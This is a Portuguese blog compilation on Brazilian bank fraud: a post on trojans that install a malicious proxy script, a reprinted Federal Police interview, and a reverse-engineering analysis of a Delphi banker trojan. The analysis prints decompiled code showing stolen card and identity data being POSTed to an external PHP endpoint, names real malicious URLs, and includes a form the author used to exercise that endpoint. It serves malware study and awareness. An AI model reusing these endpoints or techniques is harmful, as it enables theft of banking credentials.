Vídeo: O perigo dos malwares que alteram o proxy

Trojans Bankers que alteram o proxy do navegador já são conhecidos dos brasileiros há algum tempo. Entretanto, um detalhe dessa técnica pode ainda fazer muitas vítimas e passar desapercebido do usuário.

No início do mês recebi um phishing do tipo “Oi, veja minha foto...”, baixei o malware e fiz a engenharia reversa. Localizei a URL de um segundo malware e ao reverter esse descobri que inseria uma URL contendo um script de configuração de proxy no navegador da vítima:

http://www.gifgroup.ru/includes/file.pac

Para quem não sabe, proxy é uma aplicação muito utilizada nas empresas, principalmente para redirecionar a navegação, controlar o acesso a sites, armazenar as páginas mais utilizadas em cache para acelerar a navegação, dentre outras funções. Um dos mais conhecidos é o Squid.

Os criminosos utilizam esse sistema para redirecionar, de forma transparente, suas vítimas para sites falsos quando elas digitam o endereço verdadeiro. Isso ocorre principalmente com os sites bancários.

Esse caso analisado utilizava a página do Banco do Brasil. Então, com o proxy configurado pelo malware, quando eu digitar no navegador www.bb.com.br ele exibirá uma página falsa do BB porém o endereço que irá aparecer no navegador será o verdadeiro do site.

Isso torna o golpe mais convincente e de difícil detecção, principalmente pelos usuários domésticos. Pode-se pensar: se o endereço que está aparecendo no meu navegador é o verdadeiro do site porque a página seria falsa?

Veja abaixo o vídeo demonstrando o phishing.

Ronaldo Lima
crimesciberneticos.com | twitter.com/crimescibernet

Notícia: Fraudes bancárias pela Internet chegam a 2.4 mil por dia, diz PF

Resolvi reproduzir essa notícia aqui por estar totalmente relacionada com o Blog, trata-se de uma entrevista com o delegado Carlos Eduardo Sobral, chefe da Unidade de Repressão a Crimes Cibernéticos da Polícia Federal. Publicada pelo portal iG.

Fraudes virtuais contra bancos chegam a 2,4 mil por dia, diz PF

Nova metodologia no combate aos crimes virtuais busca identificar quadrilhas e reduzir crimes na internet

Severino Motta, iG Brasília | 26/01/2011 07:00

O chefe da Unidade de Repressão a Crimes Cibernéticos da Polícia Federal, Carlos Eduardo Sobral, disse ao iG que cerca de 2,4 mil ações criminosas são realizadas por dia, em média, contra os bancos brasileiros através da internet. De acordo com ele, o prejuízo anunciado pelas instituições financeiras com esse tipo de delito chega à casa dos R$ 900 milhões. Como a maioria das fraudes desvia valores na casa dos R$ 1 mil, chega-se à marca de cerca de 900 mil golpes por ano no país.

O número é pequeno – cerca de 0,01% - no universo das transações financeiras virtuais, que está na casa de 10 bilhões ao ano, mas considerado grande do ponto de vista da prática criminal. Em 2010, devido ao projeto Tentáculos, que agrupa diversas ações criminosas num único inquérito e racionaliza as investigações, o número de operações saltou de duas (2009) para oito, com a prisão de 137 pessoas.

O Tentáculos, em conjunto com o projeto Oráculo, tentará, em 2011, identificar fraudadores e programadores que agindo em sintonia são responsáveis por invasões de computadores pessoais que, em seguida, se transformam em fraudes contra os bancos. Com os projetos, acredita Sobral, o número de crimes deve ser reduzido num breve espaço de tempo.

Em entrevista, o delegado também fala sobre a necessidade de se discutir a legislação existente no Brasil contra os crimes virtuais. Segundo ele, caso um réu primário seja pego furtando R$ 20 milhões de um banco através da internet, não há como enviá-lo à cadeia. Veja abaixo os principais trechos da entrevista:

iG: Como estão agindo as quadrilhas que roubam bancos pela internet?
Eduardo Sobral: Percebemos que não há quadrilha especializada em banco A, B, C ou D. Eles disseminam códigos maliciosos e capturam contas de clientes de todos os bancos. Tínhamos parceria com a Caixa Econômica Federal (CEF), que nos dava visão parcial do problema. Agora temos uma parceria com a Febraban (Federação Brasileira de Bancos) e os 10 dos maiores bancos aderiram à parceria, estamos montando um sistema online para que assim que a fraude for detectada pela instituição financeira nós recebamos os dados para cruzá-los e identificar as quadrilhas.

iG: Quantas ações criminosas acontecem em média no País?
Sobral: É uma quantidade grande, pois o criminoso tira quantidades pequenas em valores, mas de muitas contas diferentes. É grande a quantidade de atos criminosos vinculados a uma quantidade menor de quadrilhas. Precisamos agrupar um grande número de crimes para ter estratégia de ação. São cerca de nove mil notificações por mês somente da Caixa. No ano passado a Febraban disse que o prejuízo foi de R$ 900 milhões. Como a média é de R$ 900 a R$ 1 mil por transação dá para se ter idéia de quantas transações foram. É pouco perto do que os bancos movimentam, mas é quantidade alta para o crime.

iG: Então são cerca de 900 mil ações por ano?
Sobral: Isso.

iG: Como se investiga isso?
Sobral: Antes era uma investigação para cada ato criminoso, o que gerava milhares de inquéritos, consumindo toda nossa força de trabalho e com chance de sucesso próxima a zero. Hoje não instauramos milhares de inquéritos. Conseguimos ter inteligência, enxergar quadrilhas. No ano passado tivemos 137 prisões em 8 operações, contra duas operações em 2009. E lembrando que o sistema Tentáculos começou a funcionar em junho de 2010, que une esses dados. Agora, com informações de outros bancos chegando, vamos enxergar a atuação das quadrilhas e devemos ter queda no médio e longo prazo.

iG: Há também ataques diretos contra os bancos ou se busca atacar os usuários para obter dados e depois entrar no banco?
Sobral: A grande maioria é de ataques aos usuários. As condições de defesa do usuário são menores que a de um banco, que tem toda uma equipe de Tecnologia da Informação (TI). O criminoso tenta enganar, manda mensagens falsas. As vezes o antivírus alerta, e o usuário, achando que recebeu a foto de um amigo, aceita. Ou, às vezes, usando o computador e estando distraído, clica em aceitar algum arquivo ou autoriza o acesso ao link. Há casos em que usam o e-mail de um conhecido, falsificando o remetente, e você abre as fotos do churrasco, ou do fim de semana e fica exposto.

iG: Como pegar essas quadrilhas? Os criminosos estão no Brasil ou agem do exterior?
Sobral: Os criminosos estão no Brasil. Alguns entendem mais de tecnologia e têm usado técnicas para dificultar investigação. Mas crimes que envolvem transferência de recursos sempre deixam rastro. Há movimentação de dinheiro, pagamento de um título. Há indício a seguir, desde que reúna grande quantidade de ações. E quem faz o dinheiro normalmente não tem conhecimento em tecnologia. Ele compra o pacote pronto. Por isso estamos com outro projeto, o Oráculo, para chegar nessa pessoa, que entende de tecnologia e está desenvolvendo soluções.

iG: Em 2010 aconteceram prisões de quem faz o programa ou só de quem faz o dinheiro?
Sobral: Tiveram dois. Em Fortaleza e no Maranhão chegamos ao programador. As demais operações ficaram no primeiro nível (dinheiro).

iG: Há legislação para punir quem pratica esses crimes?
Sobral: Para a fraude sim, para o programador tem que provar que ele sabia que fez isso para fraude, que fazia parte da quadrilha.

iG: Qual o crime?
Sobral: Furto qualificado pela fraude.

iG: E se o programador diz que não sabia qual seria o uso do código que ele escreveu?
Sobral: Se ele provar que não sabia ele vai ser absolvido, pois não é crime no Brasil produzir programa espião. Acho, porém, que deveria ser criminalizada a produção e distribuição de código malicioso para fim de fraude. Por que eu iria desenvolver um código malicioso específico, que não é pesquisa, não é inovador, não é desenvolvedor? É alguém que está usando o conhecimento para a prática de crime. Nós criminalizamos a construção de máquina que falsifique moeda, por exemplo.

iG: Mas então, se ele mostrar na Justiça que não sabia para que seria usado seu programa ele fica livre?
Sobral: Cai no artigo 155 (furto qualificado pela fraude), mas como partícipe. Sua pena é menor. Se participa em grande escala é coautor.

iG: Se é participe vai para cadeia?
Sobral: Não.

iG: Mesmo se souber que fez para uma quadrilha roubar?
Sobral: A cadeia hoje no Brasil é voltada para crimes graves, violento s e para reincidentes. (Réu) Primário, se não tiver violência, é muito difícil ser condenado (a cadeia).

iG: Então, se os fraudadores forem réus primários, também não vão para cadeia?
Sobral: Ele acaba pegando pena substitutiva. Doar cestas básicas, prestação de serviços à comunidade. Qualquer pena até quatro anos é assim.

iG: Isso não estimula o crime? Pois, se der errado, não há cadeia...
Sobral: É uma discussão que tem tomado tempo de muitos especialistas não só no Brasil, mas em todo o mundo. Temos que garantir que haverá certeza da identificação, da responsabilização via processo e que a responsabilização seja adequada e compatível para que o criminoso não se sinta incentivado à prática de crime, pois a cesta básica não é pena adequada para quem desvia R$ 20 milhões ou R$ 25 milhões.

iG: Temos criminosos cibernéticos, digamos assim, de alto nível?
Sobral: Na fraude bancária, sim. O criminoso é avançado. Estuda. Mesmo porque o sistema bancário aqui investiu muito em virtualização. Migrou muito para internet e ampliou os alvos para os criminosos.

Análise do Malware Real-SecureWeb.exe Parte 2

No artigo anterior apresentei a análise do arquivo Real-SecureWeb.exe e vimos que se tratava de um malware banker tentando capturar informações dos clientes do banco Real Santander. Para uma melhor compreensão dessa segunda parte sugiro a leitura da anterior.

Conforme foi constado nos logs capturados pelo Process Monitor, o arquivo Real-SecureWeb.exe descompactava e executava dois arquivos: Real.exe e Reals.exe.

E ainda, o arquivo Real.exe gerava um outro chamado indentificando.txt. Isso mesmo, INdentificando, só agora notei essa grafia errada que foi utizada para nomear o arquivo. Isso por sinal é uma constante nesse malware, palavras escritas erradas e expressões chulas.

Vejamos agora a análise de cada um desses três arquivos.

1) Real.exe

O primeiro passo é descobrir se o executável possuí algum compactador (packer), fiz isso utilizando o RDG Packer Detector.

Não foi encontrado nada, identificou a linguagem de programação Borland Delphi v6.0 ou v7.0. Outro detalhe interessante que o RDG apresentou corretamente foi a origem do malware.

Sabendo que é Delphi, podemos tentar a descompilação com o DeDe, que costuma apresentar bons resultados como por exemplo Forms, Units e Eventos recuperados.

Ao submeter o arquivo Real.exe ao DeDe foi identificado o nome do projeto “dragon”, também encontrou um Form chamado “dilma” (!), a Unit chamada “orion” e alguns nomes de componentes. Isso pode ser visto na imagem abaixo.

Sabemos que o Real.exe é responsável por apresentar as telas do malware onde as vítimas digitam os dados e também vimos no artigo anterior que ele cria o arquivo indentificando.txt através dessas diretivas:

03:10:45,1509465,"Real.exe","CreateFile","C:\indentificando.txt"

03:10:45,1523162,"Real.exe","WriteFile","C:\indentificando.txt" 03:10:45,1529191,"Real.exe","CloseFile","C:\indentificando.txt"

No código descompilado não foi possível encontrar esse caminho do arquivo indentificando.txt, isso porque a string está criptografada com uma função interna do malware, através do debug seria possível localizá-la.

Porém, no código há algumas pistas do que esse arquivo pode conter, no Form “dilma” existe um botão “Confirmar” que possui atríbuído ao evento OnClick uma procedure chamada “vaiClick”:

procedure Tdilma.vaiClick(Sender : Tobject);

Nessa procedure, dentre outras coisas, existe a captura de todos os dados que foram digitados nos campos do formulário (componentes TEdit) e ao final esses dados são atribuídos a um componente TMemo que foi nomeado de forma bem culta, “xupameupinto”.

Tdilma.xupameupinto : TMemo

O que se segue são sequências de funções que atribuem ao componente TMemo linhas que contêm um rótulo e a informação que a vítima digitou.

Reference to control Tdilma.xupameupinto : TMemo

Reference to field TMemo.Lines : Tstrings

Possible String Reference to: '********************************'

Reference to method Tstrings.Add(string)

Reference to method TStrings.Add(string)

Reference to control Tdilma.a3 : TEdit

Reference to: Controls.TControl.GetText(TControl):TCaption;

Possible String Reference to: 'AG..........:'

Reference to control Tdilma.xupameupinto : TMemo

Reference to field TMemo.Lines : TStrings

Reference to method TStrings.Add(string)

Reference to control Tdilma.a4 : TEdit

Reference to: Controls.TControl.GetText(TControl):TCaption;

Possible String Reference to: 'Cont........:'

Reference to control Tdilma.xupameupinto : TMemo

Reference to field TMemo.Lines : TStrings

Reference to method TStrings.Add(string)

Reference to control Tdilma.CC : TcomboBox

Reference to: Controls.TControl.GetText(TControl):TCaption;

Possible String Reference to: 'bandeira....:'

Essa sequência se repete para todos os campos Edits, até que no final é utilizado o método Tstrings.SaveToFile(string) e é passada como parâmetro uma string criptografada, que deve ser o caminho “C:\indentificando.txt”.

Possible String Reference to: 'GpfSQMvaPMvqQMPfOs5kP6ykT7Xq'

Reference to: System.@LStrToPChar(String):PAnsiChar;

Reference to method TStrings.SaveToFile(string)

Possible String Reference to: 'Obrigado por sua atenção o Banco Real Santander agradece.'

2) indentificando.txt

Ao analisar o arquivo indentificando.txt foi encontrado esse conteúdo:

******************************** AG..........:1111 Cont........:1111111 bandeira....:Visa CC..........:1111-1111-1111-1111 vencimento..:1/2014 Senha/3.....:111 disk........:1111 ********************************************** Dados Confirmação CPF..........................:111.111.111-11 RG...........................:111111111111 Naturalidade.................:aaaaaaaaaa Nome do Pai..................:aaaaaaaaaaa Estado Civil.................:aaaaaaaaaaaaaa nome do corno................:aaaaaaaaaa escolaridade.................:Pós-Graduação formado......................:aaaaaaaaa Profissão....................:aaaaaaaaaa Empressa Atual...............:aaaaaaaaaaaa Empresa quando abriu conta...:aaaaaaaaa Tempo de conta...............:aaaaaaaaaaaa **********************************************

A Imagem abaixo mostra isso:

O conteúdo corrobora o que foi encontrado nos códigos do Delphi no arquivo Real.exe.

3) Reals.exe

A análise do nosso terceiro arquivo seguiu o mesmo esquema do anterior. Foi identificada a linguagem Delphi e depois feita a descompilação com o DeDe.

Dessa vez o projeto foi nomeado como “pugaaqui”, o Form “bobiodanco” e a Unit “unidosvaiser”.

Destaque para os nomes dos componentes e procedures da Unit:

carregasualma: TMemo;

tempobom: TTimer;

amuandomtu: TIdHTTP;

procedure goldeletra(Sender : TObject);

procedure tempobomTimer(Sender : TObject);

Vejamos o que a procedure tempobomTimer faz.

procedure Tbobiodanco.tempobomTimer(Sender : TObject);

begin

Possible String Reference to: 'C:\indentificando.txt'

Reference to: SysUtils.FileExists(AnsiString):Boolean;

Reference to control Tbobiodanco.carregasualma : TMemo

Reference to field TMemo.Lines : TStrings

Possible String Reference to: 'C:\indentificando.txt'

Reference to method TStrings.LoadFromFile(string)

Reference to bobiodanco

Reference to : Tbobiodanco.goldeletra()

end;

Basicamente lê o arquivo indentificando.txt, atribui seu conteúdo ao TMemo e chama a procedure goldeletra.

Vejamos a goldeletra agora.

procedure Tbobiodanco.goldeletra(Sender : TObject);

begin

***** TRY

Reference to class TStringList

Reference to: System.TObject.Create(TObject;Boolean);

Reference to bobiodanco

Reference to control Tbobiodanco.carregasualma : TMemo

Reference to field TMemo.Lines : TStrings

Reference to method TStrings.Put(Integer,string)

Possible String Reference to: 'praque=xxxxxx@gmail.com,yyyyyyy@gmail.com'

Reference to method TStringList.Add(string)

Possible String Reference to: 'titul=xxxxxxxxxxxx'

Reference to method TStringList.Add(string)

Reference to bobiodanco

Reference to control Tbobiodanco.carregasualma : TMemo

Reference to: Controls.TControl.GetText(TControl):TCaption;

Possible String Reference to: 'text='

Reference to: System.@LStrCat3;

Reference to method TStringList.Add(string)

***** TRY

Reference to bobiodanco

Reference to control Tbobiodanco.amuandomtu : TIdHTTP

Possible String Reference to: 'http://esec.ru/upload/noro.php'

Reference to bobiodanco

Reference to control Tbobiodanco.tempobom : TTimer

Reference to: ExtCtrls.TTimer.SetEnabled(TTimer;Boolean);

****** FINALLY

Reference to bobiodanco

Reference to control Tbobiodanco.amuandomtu : TIdHTTP

Reference to: System.TObject.Free(TObject);

Reference to: System.TObject.Free(TObject);

Possible String Reference to: 'C:\indentificando.txt'

Reference to: Grids.TInplaceEdit.Visible(TInplaceEdit):Boolean;

Reference to TApplication instance

Reference to: Forms.TApplication.Terminate(TApplication);

Reference to: System.@HandleFinally;

****** END

****** FINALLY

end;

Vemos aqui quanta informação útil o DeDe conseguiu recuperar através do processo de descompilação do executável.

Essa procedure goldeletra atribui dois endereços de e-mail para a variável “praque”, atribui um título qualquer para a variável “titul” e atribui o conteúdo do componente TMemo para a variável “text”.

Depois através de um componente de conexão HTTP se conecta ao endereço “http://esec.ru/upload/noro.php”. Por fim libera os componentes utilizados.

Então assim como constatei na análise da fraude do iToken Itaú, esse malware utiliza uma página PHP para enviar por e-mail para os fraudadores os dados furtados.

Para testar esse procedimento de envio de e-mail primeiro tentei passar o conteúdo das variáveis pela URL através do método GET digitando no navegador:

http://esec.ru/upload/noro.php?praque=rplmetal@ig.com.br&titul=assunto&text=qualquercoisa

Isso não funcionou, lembrei então que na fraude do iToken era utilizado o método POST de envio de variáveis, assim só poderia enviar as informações através de um formulário HTML.

Criei o formulário HTML com esse código:

<form name="form1" method="post" action="http://esec.ru/upload/noro.php">

Email: <input type="text" name="praque" size="40"><br><br>

Assunto: <input type="text" name="titul" size="40"><br><br>

Texto: <input type="text" name="text" size="40"><br><br>

<input type="submit">

</form>

E enviei com os campos preenchidos conforme a imagem abaixo:

Após clicar no botão Enviar fui conferir meu e-mail para ver se havia chegado a mensagem. Conforme o esperado isso realmente aconteceu:

Conclusão

Ao analisar as duas partes desse artigo nota-se que esse malware é bem direto e objetivo. Executa, solicita as informações, envia por e-mail e depois apaga tudo (tenta pelo menos). Não faz nenhuma modificação no computador além dessas.

O comportamento dele me lembrou do programa utilizado para enviar a declaração de Imposto de Renda. No sistema da Receita Federal utiliza-se um programa para preencher a declaração e salvar no computador e outro (ReceitaNet) para enviar pela Internet.

A mesma coisa acontece com esse golpe, em um programa preenche-se a “declaração” para o fraudador e é salva no computador e o outro envia a “declaração”.

Vimos que com o uso de variadas técnicas e ferramentas podemos obter valiosas informações sobre o comportamento dos malwares.

Comentários?

Comentário enriquecedor feito pelo Rodrigo Lima:

Esse tipo de malware é conhecido no underground dos criminosos como "Módulo de Controle". O objetivo final é obter êxito na fraude através do canal de telefônia existente no Banco Real chamado Disque Real.

Observe que nem os dados de acesso ao Internet Banking é solicitado, as perguntas existentes nesse formulário uma vez capturado da vítima são utilizados durante a engenharia social entre o fraudador e o operador(a) do Disque Real.

Outra coisa são os mais variados tipos de Anti-Virus que em sua grande maioria não classificam esse tipo de arquivo como malware nem assinatura existe :-(

Mais análises de golpes pela Internet nesse link: Fraudes Bancárias.

Ronaldo Lima

crimesciberneticos.com | twitter.com/crimescibernet